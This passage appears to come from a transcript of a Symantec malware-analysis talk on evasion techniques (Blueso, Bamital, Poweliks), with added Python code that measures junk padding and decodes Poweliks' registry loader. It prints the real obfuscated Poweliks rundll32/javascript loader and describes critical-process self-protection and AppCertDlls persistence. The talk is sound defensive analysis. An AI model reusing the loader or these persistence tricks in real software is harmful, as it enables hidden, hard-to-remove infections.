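    """Yield the non-blank, non-comment lines of an AutoIt script."""
    in_block = False
    for line in script.splitlines():
        if in_block:
            if BLOCK_END.match(line):
                in_block = False
            continue
        if BLOCK_START.match(line):
            in_block = True
            continue
        stripped = strip_line_comment(line).strip()
        if stripped:
            yield stripped


def junk_ratio(script: str):
    """Return (total_lines, code_lines, code_fraction) for a script."""
    total = len(script.splitlines())
    code = sum(1 for _ in code_lines(script))
    return total, code, (code / total if total else 0.0)


# Constructed sample: 196 junk comment lines plus a 3-line block comment
# hide four lines of code that read a key file and an encrypted blob.
JUNK = "\n".join(f"; {'x' * 60} junk comment {i}" for i in range(196))
SAMPLE = "\n".join([
    "#cs",
    "block comment padding",
    "#ce",
    JUNK,
    '$sKey = FileRead("key.cfg")  ; key lives in a separate file',
    '$sEnc = FileRead("payload.dat")',
    "Func Decrypt($d, $k)",
    "EndFunc",
])

if __name__ == "__main__":
    total, code, frac = junk_ratio(SAMPLE)
    print(f"{total} lines, {code} code lines, {frac:.1%} code")
```

A very low code fraction on a very large script is exactly the shape slide 19 describes (900 code lines out of 87476), and the stripper costs one linear pass, which is cheaper than the partial scans slide 21 says a scanner has to run on header-less files.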
Slide 22: Attacker's techniques to avoid detection (agenda; technique 3: process protection)

Slide 23: How does Blueso start and protect itself?
[Diagram: AutoIt executable (code, decryption key, encrypted code) -> decryption -> legitimate Windows process -> Internet Explorer process, annotated "Malware!!", "Malware??" and "What is wrong??"]

Slide 24: Process protection mechanism
1) Terminate Internet Explorer
-> The malicious code injected into the legitimate Windows process starts it again.
2) Terminate the legitimate Windows process
-> The script running under AutoIt starts it again.
3) Terminate AutoIt?
-> The AutoIt executable has marked itself as an essential process of the Windows system by using the undocumented API NtSetInformationProcess (the ProcessBreakOnTermination information class, the same flag RtlSetProcessIsCritical sets; setting it requires SeDebugPrivilege, so the dropper must already be running with administrative rights).
As soon as AutoIt is terminated, Windows treats it as an unrecoverable critical problem.
-> Blue Screen Of Death!!

Slide 25: Blue Screen Of Death
[Screenshot]

Slide 26: Attacker's techniques to avoid detection (agenda; technique 4: store malicious code outside of files (fileless malware))

Slide 27: Example of malware storing code/data in an irregular place (Bamital)
Bamital sets a registry entry to start its code when Windows restarts:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls\"AppSecDll" = "%USER_Profile%\Local Settings\Application Data\Windows Server\xblscp.dll"
(A DLL listed under AppCertDlls is loaded into every process that calls the CreateProcess family of APIs, so the malware needs no process of its own.)
Because of analysis already performed, xblscp.dll is classified as a malicious file. Strictly speaking, though, does this file contain malicious code?

Slide 28: Example of malware storing code/data in an irregular place (Bamital) 2
How it works:
• Allocate memory
• Copy the data from the registry into the allocated memory
• Call the allocated memory
The antivirus scanner does not know the format of the data, and the data is written in the registry, not in a file.
Other malware uses the same technique with a file instead of the registry.

Slide 29: Example of malware storing code/data in an irregular place (Poweliks)
Trojan.Poweliks stores its code, including a Windows PowerShell script, in the registry. The registry entry below executes obfuscated JavaScript; the script that it loads is kept, encoded, in a different registry value and has to be decoded first.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default) =
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/S~Se)(ILDS]]dmtje]]|84f81:.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return String.fromCharCode(_.charCodeAt()-1);}))
"a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@ ...
(The eval() argument is the loader script with every character code shifted up by one, which the .replace() callback shifts back down; the "#@~^" prefix on the "a" value is the signature of a JScript.Encode encoded script.)
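The decoding step from slide 29, as an added example that is not code from the presentation: the same character shift the slide's `.replace()` callback performs, done in Python, followed by extraction of the registry path the decoded loader reads and a check for the JScript.Encode signature on the second-stage value. The encoded string is re-typed from the slide; three spots where the transcript is damaged are restored here and are assumptions, not slide text: the token `SfhSfbe` (which decodes to `RegRead`), and the characters `fb` and `tf`, which are needed for the string to decode to the CLSID printed on the same slide.

```python
"""Decode the first stage of the Poweliks LocalServer32 entry from the slide.

Added example, not code from the presentation. The registry value runs
rundll32.exe with a javascript: URL whose eval() argument is a string in
which every character was shifted up by one; the .replace(/./g, ...) on
the slide shifts each one back. This block does the same shift, pulls out
the registry path the decoded script reads, and checks whether the second
stage value it points to carries the "#@~^" marker of a JScript.Encode
(screnc) encoded script.
"""
import re

# Re-typed from the slide. Restored (assumed) spots are marked on each line.
ENCODED = (
    "epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)"
    "ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)("           # 'SfhSfbe' restored
    "ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]"   # 'fb' restored
    "mpdbmtfswfs43]]b(*,(=0tdsjqu?(*"                         # 'tf' restored
)

# First bytes of the "a" value as printed on the slide (truncated there too).
SECOND_STAGE_VALUE = "#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@"


def shift_decode(text: str, shift: int = 1) -> str:
    """Undo the charCodeAt()+shift obfuscation, as the slide's .replace() does."""
    return "".join(chr(ord(ch) - shift) for ch in text)


def regread_path(script: str):
    """Return the registry path passed to WScript.Shell.RegRead, with JS escapes undone."""
    m = re.search(r"RegRead\('([^']+)'\)", script)
    return m.group(1).replace("\\\\", "\\") if m else None


def is_jscript_encoded(value: str) -> bool:
    """JScript.Encode (screnc) output always starts with the '#@~^' marker."""
    return value.startswith("#@~^")


def triage_localserver32(value: str) -> dict:
    """Flag the traits of a Poweliks-style LocalServer32 default value."""
    lowered = value.lower()
    return {
        "rundll32_javascript": "rundll32" in lowered and "javascript:" in lowered,
        "mshtml_runhtmlapplication": "runhtmlapplication" in lowered,
        "eval_present": "eval(" in lowered,
    }


if __name__ == "__main__":
    decoded = shift_decode(ENCODED)
    print(decoded)
    print("loader reads:", regread_path(decoded))
    print("second stage is JScript.Encode:", is_jscript_encoded(SECOND_STAGE_VALUE))
```

The decoded string is a `document.write()` of a `<script language=jscript.encode>` element whose body is read with `WScript.Shell.RegRead` from the `a` value under the same CLSID's `localserver32` key, so the only artefacts on disk are registry values, which is the point of slide 29.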
Slide 30: Conclusion
• Attackers discover new techniques every day.
• Attackers employ techniques to make malware removal difficult.
• File-based scanning on its own is no longer effective.
• Multi-layered security is becoming more important.

Slide 31: Q & A

Slide 32: Thank you!
Hiroshi Shinotsuka
Copyright © 2014 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.

Editor's Notes

  2. Loading the 32 MB AutoIt script file into the Notepad that ships with Windows took 4 seconds. Imagine double-clicking a file to run it and having to wait 4 seconds before it starts... nobody would put up with that!